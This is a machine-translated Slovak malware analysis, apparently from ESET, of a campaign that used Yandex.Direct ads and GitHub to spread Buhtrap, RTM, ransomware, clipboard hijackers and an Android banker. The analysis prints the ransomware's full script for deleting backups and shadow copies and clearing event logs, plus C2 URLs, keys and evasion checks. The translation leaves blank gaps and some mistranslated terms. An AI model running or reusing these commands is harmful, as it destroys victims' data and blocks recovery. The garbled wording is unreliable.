Ak chcete zacieliť na účtovníkov pri kybernetickom útoku, môžete použiť pracovné dokumenty, ktoré hľadajú online. To je zhruba to, čo kybernetická skupina robila za posledných pár mesiacov a šírila známe zadné vrátka. и , ako aj šifrovače a softvér na kradnutie kryptomien. Väčšina cieľov sa nachádza v Rusku. Útok bol vykonaný umiestnením škodlivej reklamy na Yandex.Direct. Potenciálne obete boli nasmerované na webovú stránku, kde boli požiadané, aby si stiahli škodlivý súbor maskovaný ako šablóna dokumentu. Yandex po našom varovaní odstránil škodlivú reklamu.
Buhtrapov zdrojový kód už v minulosti unikol online, takže ho môže použiť ktokoľvek. Nemáme žiadne informácie o dostupnosti kódu RTM.
V tomto príspevku vám povieme, ako útočníci distribuovali malvér pomocou Yandex.Direct a hostili ho na GitHub. Príspevok bude ukončený technickou analýzou škodlivého softvéru.
Buhtrap a RTM sú späť v podnikaní
Mechanizmus šírenia a obete
Rôzne užitočné zaťaženia doručené obetiam zdieľajú spoločný mechanizmus šírenia. Všetky škodlivé súbory vytvorené útočníkmi boli umiestnené v dvoch rôznych úložiskách GitHub.
Úložisko zvyčajne obsahovalo jeden škodlivý súbor na stiahnutie, ktorý sa často menil. Keďže GitHub umožňuje zobraziť históriu zmien v úložisku, môžeme vidieť, aký malvér bol distribuovaný počas určitého obdobia. Na presvedčenie obete, aby si stiahla škodlivý súbor, bola použitá webová stránka blanki-shabloni24[.]ru, znázornená na obrázku vyššie.
Dizajn stránky a všetky názvy škodlivých súborov sledujú jednotný koncept – formuláre, šablóny, zmluvy, vzory atď. Vzhľadom na to, že softvér Buhtrap a RTM už boli v minulosti použité pri útokoch na účtovníkov, predpokladali sme, že stratégia v novej kampani je rovnaká. Jedinou otázkou je, ako sa obeť dostala na stránku útočníkov.
infekcie
Minimálne niekoľko potenciálnych obetí, ktoré skončili na tejto stránke, prilákala škodlivá reklama. Nižšie je uvedený príklad adresy URL:
https://blanki-shabloni24.ru/?utm_source=yandex&utm_medium=banner&utm_campaign=cid|{blanki_rsya}|context&utm_content=gid|3590756360|aid|6683792549|15114654950_&utm_term=скачать бланк счета&pm_source=bb.f2.kz&pm_block=none&pm_position=0&yclid=1029648968001296456
Ako môžete vidieť z odkazu, banner bol zverejnený na legitímnom účtovnom fóre bb.f2[.]kz. Je dôležité poznamenať, že bannery sa objavili na rôznych stránkach, všetky mali rovnaké ID kampane (blanki_rsya) a väčšina sa týkala účtovníctva alebo služieb právnej pomoci. Adresa URL ukazuje, že potenciálna obeť použila požiadavku „stiahnuť formulár faktúry“, čo podporuje našu hypotézu o cielených útokoch. Nižšie sú uvedené stránky, na ktorých sa bannery objavili, a zodpovedajúce vyhľadávacie dopyty.
- stiahnuť formulár faktúry – bb.f2[.]kz
- vzor zmluvy - Ipopen[.]ru
- vzor reklamácie aplikácie - 77metrov[.]ru
- formulár dohody - blank-dogovor-kupli-prodazhi[.]ru
- vzor súdneho návrhu - zen.yandex[.]ru
- vzor sťažnosti - yurday[.]ru
- vzorové formuláre zmluvy – Regforum[.]ru
- formulár zmluvy – assistentus[.]ru
- vzor zmluvy o byte – náprava[.]com
- vzory právnych zmlúv - avito[.]ru
Stránka blanki-shabloni24[.]ru mohla byť nakonfigurovaná tak, aby prešla jednoduchým vizuálnym hodnotením. Reklama, ktorá odkazuje na profesionálne vyzerajúci web s odkazom na GitHub, zvyčajne nevyzerá ako niečo zjavne zlé. Okrem toho útočníci nahrávali škodlivé súbory do úložiska iba na obmedzené obdobie, pravdepodobne počas kampane. Repozitár GitHub väčšinou obsahoval prázdny archív zip alebo prázdny súbor EXE. Útočníci tak mohli distribuovať reklamu cez Yandex.Direct na stránky, ktoré s najväčšou pravdepodobnosťou navštívili účtovníci, ktorí prišli na základe konkrétnych vyhľadávacích dopytov.
Ďalej sa pozrime na rôzne takto rozdelené užitočné zaťaženia.
Analýza užitočného zaťaženia
Chronológia distribúcie
Škodlivá kampaň sa začala koncom októbra 2018 a je aktívna v čase písania tohto článku. Keďže celý repozitár bol verejne dostupný na GitHub, zostavili sme presnú časovú os distribúcie šiestich rôznych rodín malvéru (pozri obrázok nižšie). Na porovnanie s históriou git sme pridali riadok zobrazujúci, kedy bol odkaz na banner objavený, meraný telemetriou ESET. Ako vidíte, dobre to koreluje s dostupnosťou užitočného zaťaženia na GitHub. Nezrovnalosť na konci februára možno vysvetliť tým, že sme nemali časť histórie zmien, pretože úložisko bolo z GitHubu odstránené skôr, ako sme ho stihli získať celý.
Obrázok 1. Chronológia distribúcie malvéru.
Certifikáty na podpisovanie kódu
Kampaň využívala viacero certifikátov. Niektoré boli podpísané viac ako jednou rodinou škodlivého softvéru, čo ďalej naznačuje, že rôzne vzorky patrili do rovnakej kampane. Napriek dostupnosti súkromného kľúča operátori systematicky nepodpisovali binárne súbory a nepoužívali kľúč pre všetky vzorky. Koncom februára 2019 začali útočníci vytvárať neplatné podpisy pomocou certifikátu vlastneného spoločnosťou Google, ku ktorému nemali súkromný kľúč.
Všetky certifikáty zapojené do kampane a skupiny škodlivého softvéru, ktoré podpisujú, sú uvedené v tabuľke nižšie.
Tieto certifikáty na podpisovanie kódu sme tiež použili na vytvorenie prepojenia s inými rodinami škodlivého softvéru. Pre väčšinu certifikátov sme nenašli vzorky, ktoré by neboli distribuované cez úložisko GitHub. Certifikát TOV „MARIYA“ bol však použitý na podpísanie malvéru patriaceho do botnetu , adware a baníkov. Je nepravdepodobné, že tento malvér súvisí s touto kampaňou. S najväčšou pravdepodobnosťou bol certifikát zakúpený na darknete.
Win32/Filecoder.Buhtrap
Prvým komponentom, ktorý nás zaujal, bol novoobjavený Win32/Filecoder.Buhtrap. Toto je binárny súbor Delphi, ktorý je niekedy zabalený. Bol distribuovaný hlavne vo februári až marci 2019. Správa sa tak, ako sa na ransomvérový program patrí – prehľadáva lokálne disky a sieťové priečinky a zašifruje zistené súbory. Nepotrebuje narušiť internetové pripojenie, pretože nekontaktuje server, aby poslal šifrovacie kľúče. Namiesto toho na koniec správy o výkupnom pridá „token“ a na kontaktovanie operátorov navrhuje použiť e-mail alebo bitovú správu.
Na zašifrovanie čo najväčšieho počtu citlivých zdrojov spúšťa Filecoder.Buhtrap vlákno určené na vypnutie kľúčového softvéru, ktorý môže mať otvorené obslužné programy súborov obsahujúce cenné informácie, ktoré by mohli narúšať šifrovanie. Cieľovými procesmi sú najmä systémy správy databáz (DBMS). Okrem toho Filecoder.Buhtrap vymaže protokolové súbory a zálohy, čím sťaží obnovu dát. Ak to chcete urobiť, spustite dávkový skript nižšie.
bcdedit /set {default} bootstatuspolicy ignoreallfailures
bcdedit /set {default} recoveryenabled no
wbadmin delete catalog -quiet
wbadmin delete systemstatebackup
wbadmin delete systemstatebackup -keepversions:0
wbadmin delete backup
wmic shadowcopy delete
vssadmin delete shadows /all /quiet
reg delete "HKEY_CURRENT_USERSoftwareMicrosoftTerminal Server ClientDefault" /va /f
reg delete "HKEY_CURRENT_USERSoftwareMicrosoftTerminal Server ClientServers" /f
reg add "HKEY_CURRENT_USERSoftwareMicrosoftTerminal Server ClientServers"
attrib "%userprofile%documentsDefault.rdp" -s -h
del "%userprofile%documentsDefault.rdp"
wevtutil.exe clear-log Application
wevtutil.exe clear-log Security
wevtutil.exe clear-log System
sc config eventlog start=disabled
Filecoder.Buhtrap používa legitímnu online službu IP Logger navrhnutú na zhromažďovanie informácií o návštevníkoch webových stránok. Toto je určené na sledovanie obetí ransomvéru, za ktorý je zodpovedný príkazový riadok:
mshta.exe "javascript:document.write('');"
Súbory na šifrovanie sa vyberú, ak sa nezhodujú s tromi zoznamami vylúčení. Po prvé, nie sú šifrované súbory s nasledujúcimi príponami: .com, .cmd, .cpl, .dll, .exe, .hta, .lnk, .msc, .msi, .msp, .pif, .scr, .sys a .netopier. Po druhé, všetky súbory, ktorých úplná cesta obsahuje reťazce adresárov zo zoznamu nižšie, sú vylúčené.
.{ED7BA470-8E54-465E-825C-99712043E01C}
tor browser
opera
opera software
mozilla
mozilla firefox
internet explorer
googlechrome
google
boot
application data
apple computersafari
appdata
all users
:windows
:system volume information
:nvidia
:intel
Po tretie, niektoré názvy súborov sú tiež vylúčené zo šifrovania, medzi nimi aj názov súboru správy o výkupnom. Zoznam je uvedený nižšie. Je zrejmé, že všetky tieto výnimky sú určené na udržanie stroja v chode, ale s minimálnou jazdnou spôsobilosťou.
boot.ini
bootfont.bin
bootsect.bak
desktop.ini
iconcache.db
ntdetect.com
ntldr
ntuser.dat
ntuser.dat.log
ntuser.ini
thumbs.db
winupas.exe
your files are now encrypted.txt
windows update assistant.lnk
master.exe
unlock.exe
unlocker.exe
Schéma šifrovania súborov
Po spustení vygeneruje malvér 512-bitový pár kľúčov RSA. Súkromný exponent (d) a modul (n) sú potom zašifrované pevne zakódovaným 2048-bitovým verejným kľúčom (verejný exponent a modul), zbalené zlib a zakódované pomocou base64. Kód zodpovedný za to je znázornený na obrázku 2.
Obrázok 2. Výsledok dekompilácie Hex-Rays procesu generovania 512-bitového páru kľúčov RSA.
Nižšie je uvedený príklad obyčajného textu s vygenerovaným súkromným kľúčom, čo je token pripojený k správe o výkupnom.
DF9228F4F3CA93314B7EE4BEFC440030665D5A2318111CC3FE91A43D781E3F91BD2F6383E4A0B4F503916D75C9C576D5C2F2F073ADD4B237F7A2B3BF129AE2F399197ECC0DD002D5E60C20CE3780AB9D1FE61A47D9735036907E3F0CF8BE09E3E7646F8388AAC75FF6A4F60E7F4C2F697BF6E47B2DBCDEC156EAD854CADE53A239
Verejný kľúč útočníkov je uvedený nižšie.
e = 0x72F750D7A93C2C88BFC87AD4FC0BF4CB45E3C55701FA03D3E75162EB5A97FDA7ACF8871B220A33BEDA546815A9AD9AA0C2F375686F5009C657BB3DF35145126C71E3C2EADF14201C8331699FD0592C957698916FA9FEA8F0B120E4296193AD7F3F3531206608E2A8F997307EE7D14A9326B77F1B34C4F1469B51665757AFD38E88F758B9EA1B95406E72B69172A7253F1DFAA0FA02B53A2CC3A7F0D708D1A8CAA30D954C1FEAB10AD089EFB041DD016DCAAE05847B550861E5CACC6A59B112277B60AC0E4E5D0EA89A5127E93C2182F77FDA16356F4EF5B7B4010BCCE1B1331FCABFFD808D7DAA86EA71DFD36D7E701BD0050235BD4D3F20A97AAEF301E785005
n = 0x212ED167BAC2AEFF7C3FA76064B56240C5530A63AB098C9B9FA2DE18AF9F4E1962B467ABE2302C818860F9215E922FC2E0E28C0946A0FC746557722EBB35DF432481AC7D5DDF69468AF1E952465E61DDD06CDB3D924345A8833A7BC7D5D9B005585FE95856F5C44EA917306415B767B684CC85E7359C23231C1DCBBE714711C08848BEB06BD287781AEB53D94B7983EC9FC338D4320129EA4F568C410317895860D5A85438B2DA6BB3BAAE9D9CE65BCEA6760291D74035775F28DF4E6AB1A748F78C68AB07EA166A7309090202BB3F8FBFC19E44AC0B4D3D0A37C8AA5FA90221DA7DB178F89233E532FF90B55122B53AB821E1A3DB0F02524429DEB294B3A4EDD
Súbory sú šifrované pomocou AES-128-CBC s 256-bitovým kľúčom. Pre každý zašifrovaný súbor sa vygeneruje nový kľúč a nový inicializačný vektor. Informácie o kľúči sa pridajú na koniec zašifrovaného súboru. Zoberme si formát šifrovaného súboru.
Šifrované súbory majú nasledujúcu hlavičku:
Údaje zdrojového súboru s pridaním magickej hodnoty VEGA sú zašifrované na prvých 0x5000 bajtov. Všetky dešifrovacie informácie sú pripojené k súboru s nasledujúcou štruktúrou:
- Značka veľkosti súboru obsahuje značku označujúcu, či je súbor väčší ako 0x5000 bajtov
— Blob kľúča AES = ZlibCompress(RSAEncrypt(kľúč AES + IV, verejný kľúč vygenerovaného páru kľúčov RSA))
- RSA key blob = ZlibCompress(RSAEncrypt (vygenerovaný súkromný kľúč RSA, pevne zakódovaný verejný kľúč RSA))
Win32/ClipBanker
Win32/ClipBanker je komponent, ktorý bol distribuovaný prerušovane od konca októbra do začiatku decembra 2018. Jeho úlohou je sledovať obsah schránky, hľadá adresy kryptomenových peňaženiek. Po určení cieľovej adresy peňaženky ju ClipBanker nahradí adresou, o ktorej sa predpokladá, že patrí operátorom. Vzorky, ktoré sme skúmali, neboli zabalené ani zatemnené. Jediný mechanizmus používaný na maskovanie správania je šifrovanie reťazcov. Adresy peňaženky operátora sú šifrované pomocou RC4. Cieľové kryptomeny sú Bitcoin, Bitcoin cash, Dogecoin, Ethereum a Ripple.
Počas obdobia, keď sa malvér šíril do bitcoinových peňaženiek útočníkov, bola do VTS odoslaná malá suma, čo spochybňuje úspech kampane. Okrem toho neexistuje žiadny dôkaz, ktorý by naznačoval, že tieto transakcie vôbec súviseli s ClipBanker.
Win32/RTM
Komponent Win32/RTM bol distribuovaný niekoľko dní začiatkom marca 2019. RTM je trójsky bankár napísaný v Delphi, zameraný na vzdialené bankové systémy. V roku 2017 výskumníci ESET publikovali tohto programu, popis je stále relevantný. V januári 2019 vyšlo aj Palo Alto Networks .
Nakladač Buhtrap
Na nejaký čas bol na GitHub k dispozícii downloader, ktorý nebol podobný predchádzajúcim nástrojom Buhtrap. Otočí sa k https://94.100.18[.]67/RSS.php?<some_id> na získanie ďalšej fázy a načíta ju priamo do pamäte. Môžeme rozlíšiť dve správanie kódu druhej fázy. V prvej URL adrese RSS.php prešiel priamo backdoor Buhtrap – tento backdoor je veľmi podobný tomu, ktorý bol dostupný po úniku zdrojového kódu.
Zaujímavé je, že vidíme niekoľko kampaní so zadnými vrátkami Buhtrap a údajne ich prevádzkujú rôzni operátori. V tomto prípade je hlavný rozdiel v tom, že backdoor sa načíta priamo do pamäte a nepoužíva obvyklú schému s procesom nasadenia DLL, o ktorom sme hovorili . Okrem toho operátori zmenili kľúč RC4 používaný na šifrovanie sieťovej prevádzky na server C&C. Vo väčšine kampaní, ktoré sme videli, sa operátori neobťažovali zmenou tohto kľúča.
Druhé, zložitejšie správanie bolo, že URL RSS.php bola odovzdaná inému zavádzaču. Implementovalo určité zmätok, ako napríklad prebudovanie tabuľky dynamického importu. Účelom zavádzača je kontaktovať server C&C [.]com/api/F27F84EDA4D13B15/2, odošlite protokoly a počkajte na odpoveď. Spracuje odpoveď ako blob, načíta ju do pamäte a vykoná ju. Užitočné zaťaženie, ktoré sme videli pri vykonávaní tohto nakladača, boli rovnaké zadné vrátka Buhtrap, ale môžu tam byť aj iné komponenty.
Android/Spy.Banker
Zaujímavé je, že komponent pre Android sa našiel aj v úložisku GitHub. V hlavnej pobočke bol len jeden deň - 1. Telemetria ESET okrem zverejnenia na GitHub nenašla žiadne dôkazy o šírení tohto malvéru.
Komponent bol hosťovaný ako balík aplikácií pre Android (APK). Je to silne zahmlené. Škodlivé správanie je skryté v zašifrovanom súbore JAR umiestnenom v súbore APK. Je šifrovaný pomocou RC4 pomocou tohto kľúča:
key = [
0x87, 0xd6, 0x2e, 0x66, 0xc5, 0x8a, 0x26, 0x00, 0x72, 0x86, 0x72, 0x6f,
0x0c, 0xc1, 0xdb, 0xcb, 0x14, 0xd2, 0xa8, 0x19, 0xeb, 0x85, 0x68, 0xe1,
0x2f, 0xad, 0xbe, 0xe3, 0xb9, 0x60, 0x9b, 0xb9, 0xf4, 0xa0, 0xa2, 0x8b, 0x96
]
Na šifrovanie reťazcov sa používa rovnaký kľúč a algoritmus. JAR sa nachádza v APK_ROOT + image/files. Prvé 4 bajty súboru obsahujú dĺžku zašifrovaného JAR, ktorý začína hneď za poľom dĺžky.
Po dešifrovaní súboru sme zistili, že to bol predtým Anubis bankár pre Android. Malvér má nasledujúce funkcie:
- nahrávanie mikrofónom
- vytváranie snímok obrazovky
- získanie súradníc GPS
- keylogger
- šifrovanie údajov zariadenia a požiadavka na výkupné
- odosielanie spamu
Zaujímavé je, že bankár použil Twitter ako záložný komunikačný kanál na získanie ďalšieho C&C servera. Vzorka, ktorú sme analyzovali, používala účet @JonesTrader, ale v čase analýzy už bol zablokovaný.
Bankár obsahuje zoznam cieľových aplikácií na zariadení Android. Je dlhší ako zoznam získaný v štúdii Sophos. Zoznam obsahuje mnoho bankových aplikácií, online nákupné programy ako Amazon a eBay a kryptomenové služby.
MSIL/ClipBanker.IH
Posledným komponentom distribuovaným v rámci tejto kampane bol spustiteľný súbor .NET Windows, ktorý sa objavil v marci 2019. Väčšina študovaných verzií bola zabalená s ConfuserEx v1.0.0. Podobne ako ClipBanker, aj tento komponent používa schránku. Jeho cieľom je široká škála kryptomien, ako aj ponuky na Steame. Okrem toho používa službu IP Logger na ukradnutie bitcoinového súkromného kľúča WIF.
Ochranné mechanizmy
Okrem výhod, ktoré ConfuserEx poskytuje pri predchádzaní ladeniu, dumpingu a neoprávnenej manipulácii, komponent zahŕňa schopnosť detegovať antivírusové produkty a virtuálne stroje.
Aby malvér overil, či beží vo virtuálnom počítači, používa vstavaný príkazový riadok WMI systému Windows (WMIC) na vyžiadanie informácií o systéme BIOS, konkrétne:
wmic bios
Potom program analyzuje výstup príkazu a hľadá kľúčové slová: VBOX, VirtualBox, XEN, qemu, bochs, VM.
Na zistenie antivírusových produktov odošle malvér požiadavku Windows Management Instrumentation (WMI) do Centra zabezpečenia systému Windows pomocou ManagementObjectSearcher API, ako je uvedené nižšie. Po dekódovaní z base64 hovor vyzerá takto:
ManagementObjectSearcher('rootSecurityCenter2', 'SELECT * FROM AntivirusProduct')
Obrázok 3. Proces identifikácie antivírusových produktov.
Okrem toho malvér kontroluje, či , nástroj na ochranu pred útokmi zo schránky a ak je spustený, pozastaví všetky vlákna v tomto procese, čím deaktivuje ochranu.
Vytrvalosť
Verzia škodlivého softvéru, ktorý sme študovali, sa skopíruje %APPDATA%googleupdater.exe a nastaví atribút „hidden“ pre adresár google. Potom zmení hodnotu SoftwareMicrosoftWindows NTCurrentVersionWinlogonshell v registri Windows a pridá cestu updater.exe. Týmto spôsobom sa malvér spustí vždy, keď sa používateľ prihlási.
Škodlivé správanie
Podobne ako ClipBanker, malvér monitoruje obsah schránky a hľadá adresy kryptomenových peňaženiek a keď ich nájde, nahradí ich jednou z adries operátora. Nižšie je uvedený zoznam cieľových adries na základe toho, čo sa nachádza v kóde.
BTC_P2PKH, BTC_P2SH, BTC_BECH32, BCH_P2PKH_CashAddr, BTC_GOLD, LTC_P2PKH, LTC_BECH32, LTC_P2SH_M, ETH_ERC20, XMR, DCR, XRP, DOGE, DASH, ZEC_T_ADDR, ZEC_Z_ADDR, STELLAR, NEO, ADA, IOTA, NANO_1, NANO_3, BANANO_1, BANANO_3, STRATIS, NIOBIO, LISK, QTUM, WMZ, WMX, WME, VERTCOIN, TRON, TEZOS, QIWI_ID, YANDEX_ID, NAMECOIN, B58_PRIVATEKEY, STEAM_URL
Pre každý typ adresy existuje zodpovedajúci regulárny výraz. Hodnota STEAM_URL sa používa na útok na systém Steam, ako je možné vidieť z regulárneho výrazu, ktorý sa používa na definovanie vo vyrovnávacej pamäti:
b(https://|http://|)steamcommunity.com/tradeoffer/new/?partner=[0-9]+&token=[a-zA-Z0-9]+b
Exfiltračný kanál
Okrem nahradenia adries vo vyrovnávacej pamäti sa malvér zameriava na súkromné kľúče WIF bitcoinových, bitcoinových jadier a bitcoinových peňaženiek Electrum. Program používa plogger.org ako exfiltračný kanál na získanie súkromného kľúča WIF. Na tento účel operátori pridajú údaje súkromného kľúča do hlavičky HTTP User-Agent, ako je uvedené nižšie.
Obrázok 4. Konzola IP Logger s výstupnými údajmi.
Operátori nepoužívali iplogger.org na exfiltráciu peňaženiek. Pravdepodobne sa uchýlili k inej metóde kvôli limitu 255 znakov v poli User-Agentzobrazené vo webovom rozhraní IP Logger. Vo vzorkách, ktoré sme študovali, bol druhý výstupný server uložený v premennej prostredia DiscordWebHook. Prekvapivo táto premenná prostredia nie je nikde v kóde priradená. To naznačuje, že malvér je stále vo vývoji a premenná je priradená k testovaciemu stroju operátora.
Existuje ďalší znak, že program je vo vývoji. Binárny súbor obsahuje dve adresy URL iplogger.org a obe sa spýtajú pri exfiltrácii údajov. V požiadavke na jednu z týchto adries URL sa pred hodnotou v poli Referer uvádza „DEV /“. Našli sme aj verziu, ktorá nebola zabalená pomocou ConfuserEx, príjemca tejto adresy URL sa volá DevFeedbackUrl. Na základe názvu premennej prostredia sa domnievame, že operátori plánujú využiť legitímnu službu Discord a jej systém na odpočúvanie webu na krádeže kryptomenových peňaženiek.
Záver
Táto kampaň je príkladom využitia legitímnych reklamných služieb pri kybernetických útokoch. Schéma je zameraná na ruské organizácie, ale neprekvapilo by nás, keby takýto útok bol svedkom neruských služieb. Aby sa používatelia vyhli kompromisom, musia si byť istí reputáciou zdroja stiahnutého softvéru.
Kompletný zoznam indikátorov kompromisu a atribútov MITER ATT&CK je dostupný na .
Zdroj: hab.com